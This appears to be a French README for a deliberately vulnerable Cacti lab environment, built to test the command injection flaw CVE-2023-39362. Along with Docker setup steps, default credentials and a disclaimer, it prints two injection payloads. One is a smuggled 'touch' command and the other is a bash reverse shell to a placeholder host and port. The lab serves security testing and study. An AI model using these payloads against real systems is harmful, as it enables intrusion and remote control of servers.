
AVERTISSEMENT : Ceci est une application vulnérable pour tester l'exploit de l'injection de commande Cacti (CVE-2023-39362). Exécutez-la à vos propres risques !
Ceci est une application vulnérable permettant de tester l'exploit de la vulnérabilité Cacti (CVE-2023-39362).
Cette application contient de graves vulnérabilités de sécurité. Exécutez-la à vos propres risques ! Il est recommandé d'utiliser un environnement sauvegardé et isolé (comme une machine virtuelle avec un instantané récent et un réseau host-only). Ne déployez pas cette application sur des serveurs exposés à Internet, car ils seront compromis.
AVIS DE NON-RESPONSABILITÉ : Je décline toute responsabilité quant à la manière dont cette application est utilisée par quiconque. Cette application n'a pour seul but que de servir de scénario de test pour l'exploit CVE-2023-39362 et elle ne doit pas être utilisée à des fins malveillantes. Si votre serveur est compromis par une installation de cette application, cela n'engage pas ma responsabilité, mais celle de la ou des personnes qui l'ont téléversée et installée.
Voici les étapes pour configurer l'environnement :
docker compose up -d pour démarrer la composition.admin/admin.admin.guest.guest pour tester l'exploit.Le conteneur s'appellera vuln-cacti.
Le nom d'hôte d'un périphérique SNMP de test est monitored_snmp_device.
Pour démanteler l'environnement, utilisez la commande docker compose down.
Le guide d'installation officiel de Cacti est disponible ici.
Une analyse détaillée de la cause racine de la vulnérabilité est disponible dans l'avis de sécurité original ou dans mon article de blog.
(Ceci n'est qu'un exploit possible)
public\' ; touch /tmp/m3ssap0 ; \'./tmp la présence du fichier créé.Pour obtenir un reverse shell, une charge utile comme la suivante peut être utilisée.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
Ce projet est sous licence Unlicense - voir le fichier LICENSE pour plus de détails.